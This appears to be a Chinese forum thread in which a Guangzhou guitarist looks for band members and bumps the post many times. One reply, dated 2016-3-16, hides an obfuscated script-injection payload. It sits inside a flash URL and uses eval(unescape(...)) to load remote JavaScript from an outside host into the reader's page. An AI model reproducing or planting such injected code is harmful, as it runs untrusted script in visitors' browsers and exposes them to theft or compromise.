heineken 发表于 2016-2-19 12:54:01

广州番禺,求组乐队,成员不限

我是番禺上班族,吉他手,断断续续自撸了7,8年。 现在想组个乐队玩下。

如果有兴趣又符合以下条件的请加我微信: kenchen2016
1, 不限乐器,不搞创作,但要有一定水平。最少能翻一些著名乐队的作品。
2,年龄在22-40之间,男女不限,思想积极,不排挤或重视别人水平。结交本地区志同道合的朋友为重要。

如有兴趣请先加我微信,我希望将本周边地区有兴趣的人都聚在一个群上,互相认识,同时各取所需,谢谢!

wmehome 发表于 2016-2-19 13:44:15

顶一发

heineken 发表于 2016-3-3 17:37:22

顶一顶

heineken 发表于 2016-3-9 16:55:30

顶一个

muma8701 发表于 2016-3-16 00:39:38

支持楼主!支持楼主!支持楼主!支持楼主! http://www.coolool.com/flash.swf?'+eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fwww.dzsstye.com%2Fa.js%22%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source))+'

heineken 发表于 2016-3-19 15:29:22

顶一发!

heineken 发表于 2016-6-1 11:45:02

再顶一下

1230321 发表于 2016-6-1 12:00:40

番禺帮顶

heineken 发表于 2016-10-8 18:26:43

顶一顶

heineken 发表于 2016-12-12 11:14:46

顶一顶

heineken 发表于 2017-2-27 17:16:17

顶一个

heineken 发表于 2017-4-14 17:15:45

顶一下求支持

heineken 发表于 2017-8-25 15:47:34

顶一下 谢谢支持
页: [1]
查看完整版本: 广州番禺,求组乐队,成员不限